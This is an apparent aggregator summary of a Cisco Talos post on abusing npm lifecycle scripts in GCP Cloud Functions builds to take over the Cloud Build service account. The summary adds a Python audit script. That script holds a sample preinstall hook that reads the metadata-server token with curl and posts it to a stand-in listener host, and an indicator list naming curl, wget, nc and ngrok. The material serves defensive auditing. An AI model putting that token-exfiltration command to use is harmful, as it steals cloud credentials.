Source URL: https://blog.talosintelligence.com/duping-cloud-functions-an-emerging-serverless-attack-vector/
Source: Cisco Talos Blog
Title: Duping Cloud Functions: An emerging serverless attack vector
Feedly Summary: Cisco Talos built on Tenable’s discovery of a Google Cloud Platform vulnerability to uncover how attackers could exploit similar techniques across AWS and Azure.
AI Summary and Description: Yes
**Summary:** The provided text discusses a privilege-escalation vulnerability in Google Cloud Platform’s (GCP) Cloud Functions and Cloud Build services. The default Cloud Build service account carried excessive permissions, and because deploying or updating a Cloud Function triggers a Cloud Build that runs under that account, an attacker able to deploy a function could execute code with its privileges. The research by Tenable and subsequent testing by Cisco Talos examine how the same technique applies across cloud environments (GCP, AWS, Azure). Mitigation strategies and recommendations for security professionals are also detailed.
**Detailed Description:**
The article primarily focuses on a privilege-escalation vulnerability discovered by Tenable in GCP’s Cloud Functions and Cloud Build services. Here’s a breakdown of the key points:
– **Vulnerability Discovery:**
– Tenable Research uncovered a vulnerability in GCP’s Cloud Functions related to improper management of service account (SA) permissions during the deployment process.
– The default Cloud Build service account granted excessive permissions, enabling attackers to escalate their privileges if they could create or update cloud functions.
– **Attack Vector Explanation:**
– Threat actors who can create or update a Cloud Function could manipulate its deployment so that code of their choosing runs during the build step, inheriting the build service account’s excessive permissions.
– Cisco Talos replicated the attack vector across different cloud environments (AWS and Azure) using customized malicious commands placed in the `scripts` section of the Node Package Manager (NPM) `package.json` file; npm runs lifecycle scripts such as `preinstall` and `postinstall` automatically when the build installs dependencies.
– **Technical Setup:**
– Talos conducted their tests from a Debian Linux server configured in GCP, documenting the prerequisites for executing the attack, such as installing NPM and ngrok (a tunnelling tool for exposing a local listener to the internet).
– They successfully emulated the original vulnerability to prove how attackers could extract service account tokens.
– **Enumeration Techniques:**
– A variety of enumeration techniques are detailed that could be utilized by attackers, including:
– **ICMP Discovery**: Probing neighbouring hosts to map the build environment’s network.
– **Docker Environment Snapshots**: Identifying whether the build process is running inside a container.
– **CPU Scheduling**: Reading the build process’s CPU scheduling details to fingerprint the underlying host.
– **User and Network Discovery**: Collecting user and network configuration data that could support further access.
– **Google’s Response:**
– In response to the identified vulnerabilities, Google patched the relevant issues to restrict Cloud Build SA permissions.
– Google also introduced new organization policies to retain control over default service account configurations.
– **Mitigation Strategies:**
– The guidance emphasizes the principle of least privilege for service accounts, together with regular auditing and monitoring of their permissions.
– Recommendations include setting up alerts for suspicious activity, inspecting network traffic for anomalies, and verifying the integrity of NPM packages used within Cloud Functions.
– **Broader Implications:**
– While the immediate exploit may now be patched, the techniques discussed highlight ongoing concerns about security configurations in cloud environments. Organizations must remain vigilant against potential adaptive misuse of similar vulnerabilities.
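As an added example (not code from the Talos or Tenable write-ups), the following Python script implements two of the checks a defender would want given the vector and mitigations above: it scans a function’s `package.json` for npm lifecycle scripts and flags ones that reach the instance metadata server or call download/exfiltration tooling, and it lists the roles bound to a project’s default Cloud Build service account in a `gcloud projects get-iam-policy --format=json` export and flags broad ones. The manifest and policy documents are constructed samples; the indicator patterns and the set of roles treated as broad are assumptions for illustration, not a Google-published list.

```python
"""Audit checks for the Cloud Build / Cloud Functions vector described above.

Added example for this summary; not code from Tenable or Cisco Talos.
Both input documents below are constructed samples.
"""
import json
import re

# npm executes these hooks automatically during `npm install`, so a build
# pipeline that installs a function's dependencies runs them under the
# build's own identity (the Cloud Build service account on GCP).
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}

# Assumption: indicators a reviewer would treat as suspicious in a build-time
# script -- the GCE metadata server and common download/exfiltration tools.
INDICATORS = [
    re.compile(r"169\.254\.169\.254"),
    re.compile(r"metadata\.google\.internal"),
    re.compile(r"/computeMetadata/v1/.*/token"),
    re.compile(r"\b(curl|wget|nc|ncat|ngrok)\b"),
]

# The legacy default Cloud Build SA is <PROJECT_NUMBER>@cloudbuild.gserviceaccount.com.
CLOUD_BUILD_SA = re.compile(r"^serviceAccount:\d+@cloudbuild\.gserviceaccount\.com$")

# Assumption: roles a least-privilege review would flag on a build identity.
BROAD_ROLES = {
    "roles/owner",
    "roles/editor",
    "roles/iam.serviceAccountUser",
    "roles/iam.serviceAccountTokenCreator",
}


def audit_package_json(manifest: str) -> list:
    """Return one finding per lifecycle hook in the manifest's "scripts" map.

    A hook that matches an indicator is "high"; any other lifecycle hook is
    "medium", because build-time execution deserves review even when benign.
    """
    scripts = json.loads(manifest).get("scripts", {})
    findings = []
    for hook, command in scripts.items():
        if hook not in LIFECYCLE_HOOKS:
            continue  # `start`, `test`, etc. do not run during `npm install`
        hits = [p.pattern for p in INDICATORS if p.search(command)]
        findings.append({
            "hook": hook,
            "command": command,
            "indicators": hits,
            "severity": "high" if hits else "medium",
        })
    return findings


def audit_cloud_build_sa(policy: str) -> dict:
    """Summarise the roles bound to the default Cloud Build SA in an IAM policy.

    `policy` is the JSON emitted by `gcloud projects get-iam-policy PROJECT --format=json`.
    """
    bindings = json.loads(policy).get("bindings", [])
    roles = sorted({
        b["role"] for b in bindings
        if any(CLOUD_BUILD_SA.match(m) for m in b.get("members", []))
    })
    return {"roles": roles, "flagged": sorted(set(roles) & BROAD_ROLES)}


# Constructed sample: a manifest whose preinstall hook reads the metadata-server
# token and posts it to an external listener (the pattern the text describes).
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "hello-function",
    "version": "1.0.0",
    "scripts": {
        "start": "node index.js",
        "preinstall": (
            "curl -s -H 'Metadata-Flavor: Google' "
            "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token "
            "| curl -s -X POST -d @- https://listener.example.invalid/collect"
        ),
    },
})

# Constructed sample IAM policy with the build SA bound to a broad role.
SAMPLE_POLICY = json.dumps({"bindings": [
    {"role": "roles/editor",
     "members": ["serviceAccount:123456789012@cloudbuild.gserviceaccount.com"]},
    {"role": "roles/cloudbuild.builds.builder",
     "members": ["serviceAccount:123456789012@cloudbuild.gserviceaccount.com"]},
    {"role": "roles/viewer", "members": ["user:alice@example.com"]},
]})

if __name__ == "__main__":
    for f in audit_package_json(SAMPLE_PACKAGE_JSON):
        print(f"[{f['severity']}] {f['hook']}: {f['command']}  indicators={f['indicators']}")
    print(audit_cloud_build_sa(SAMPLE_POLICY))
```

Run it against the real `package.json` of each function before deployment and against the live IAM policy export; any lifecycle hook is worth a look, and a hook touching the metadata server should block the deploy. The role check only covers the legacy default Cloud Build account, so a project that has switched builds to a custom service account should substitute that account’s e-mail in `CLOUD_BUILD_SA`.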
This analysis serves as a critical reminder for security professionals to actively manage permissions within cloud services and implement comprehensive security evaluations to mitigate evolving threats.